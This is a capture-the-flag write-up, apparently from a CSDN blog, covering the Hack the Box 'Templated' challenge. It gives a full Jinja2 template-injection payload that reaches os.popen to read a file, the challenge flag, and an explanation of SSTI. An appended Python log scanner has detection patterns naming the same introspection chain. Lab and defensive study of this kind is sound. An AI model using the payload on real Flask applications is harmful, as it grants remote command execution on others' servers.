Hack the Box - Templated (SSTI) write-up

0x00 preface

I had just finished the first challenge and immediately opened the second one.

Hint: Can you exploit this simple mistake?


0x01 visit website

http://178.128.40.217:31440/

The page shows "Proudly powered by Flask/Jinja2", so the first blind guess is an SSTI (server-side template injection) vulnerability.

First, find the injection point, going by past experience.

0x02 injection point

Try this payload in the URL:

?={{3*3}}


The expression is evaluated, which confirms both that this is an SSTI vulnerability and that this is the injection point.

0x03 exploit

Here we can use Python's magic methods: first obtain the object's class with __class__, then its inheritance chain with __mro__. Because every object inherits from object, this yields the object class, and __subclasses__() then lists its subclasses. The subclass <class 'warnings.catch_warnings'> has __builtins__ in the globals of its __init__, and from there the __import__ function imports the os module and executes an arbitrary command. The final payload is as follows.

{{ "".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__["__builtins__"]["__import__"]("os").popen("cat flag.txt").read() }}

Flag: HTB{t3mpl4t3s_4r3_m0r3_p0w3rfu1_th4n_u_th1nk!}

0x04 summary

How SSTI arises

After the server receives malicious input from the user, it uses that input as part of the web application's template content without any processing. During compilation and rendering, the template engine then executes the statements the user inserted, which can break the template and lead to sensitive information disclosure, code execution, GetShell and similar problems. Simple string concatenation does not by itself cause injection; the key is what gets concatenated. If it is a control statement, the boundary between the data domain and the code domain is lost, and that is where the injection arises.

SSTI exploitation approach

We know that SSTI can do a lot of harm, including sensitive information disclosure, RCE, GetShell and so on. The key is how to use the injection point to execute the code we want, so the search for exploitation primitives is really confined to the four areas above: first, the syntax, built-in variables, attributes and functions supported by the template engine itself; second, the global variables, attributes and functions of the framework; third, the characteristics of the language itself, such as the object-oriented introspection mechanism; and finally, only when nothing else works, whatever the application itself defines, because that is rarely documented and is designed by the developer, so in general we need the application's source code to reason about it.
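As an added defender-side example (not from the original post), a stdlib-only scanner that pulls the request target out of constructed access-log lines, URL-decodes it (repeatedly, to catch double encoding), and flags the {{3*3}} probe and the dunder introspection chain used in the payload above. The log lines, the 404 sizes and the client addresses are all constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original post): an SSTI
# probe, a follow-up introspection payload, a benign search and a {% %} probe.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2021:12:00:00 +0000] "GET /?=%7B%7B3*3%7D%7D HTTP/1.1" 404 207 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Jan/2021:12:00:05 +0000] "GET /?=%7B%7B%22%22.__class__.__mro__%5B1%5D.__subclasses__()%7D%7D HTTP/1.1" 404 9120 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jan/2021:12:01:00 +0000] "GET /search?q=flask+jinja2 HTTP/1.1" 200 1532 "-" "curl/7.68.0"
198.51.100.9 - - [10/Jan/2021:12:02:00 +0000] "GET /?=%7B%25+if+1+%25%7Dx%7B%25+endif+%25%7D HTTP/1.1" 404 207 "-" "python-requests/2.25"
"""

REQUEST_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) HTTP/[\d.]+"')
TEMPLATE_TAG = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)
ARITH_PROBE = re.compile(r"\{\{\s*\d+\s*[*+\-]\s*\d+\s*\}\}")  # the classic {{3*3}} probe
# Attribute names from the introspection chain in the write-up's payload.
INTROSPECTION = ("__class__", "__mro__", "__subclasses__", "__globals__",
                 "__builtins__", "__import__", "popen")

def decode_target(target, rounds=3):
    """URL-decode repeatedly so a double-encoded payload is not missed."""
    for _ in range(rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target

def classify(target):
    """None, 'probe', 'template_syntax' or 'introspection' for one request target."""
    decoded = decode_target(target)
    tags = TEMPLATE_TAG.findall(decoded)
    if not tags:
        return None
    if any(marker in tag for tag in tags for marker in INTROSPECTION):
        return "introspection"
    if any(ARITH_PROBE.fullmatch(tag) for tag in tags):
        return "probe"
    return "template_syntax"

def scan_log(text):
    """Return (client_ip, decoded_target, verdict) for each suspicious line."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_LINE.match(line)
        verdict = classify(m.group(2)) if m else None
        if verdict:
            hits.append((m.group(1), decode_target(m.group(2)), verdict))
    return hits
```

Running scan_log over a real access log would surface the probe-then-introspection sequence from one client, which is the pattern a detection rule should alert on.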


Source: blog.csdn.net/yutao598/article/details/112985466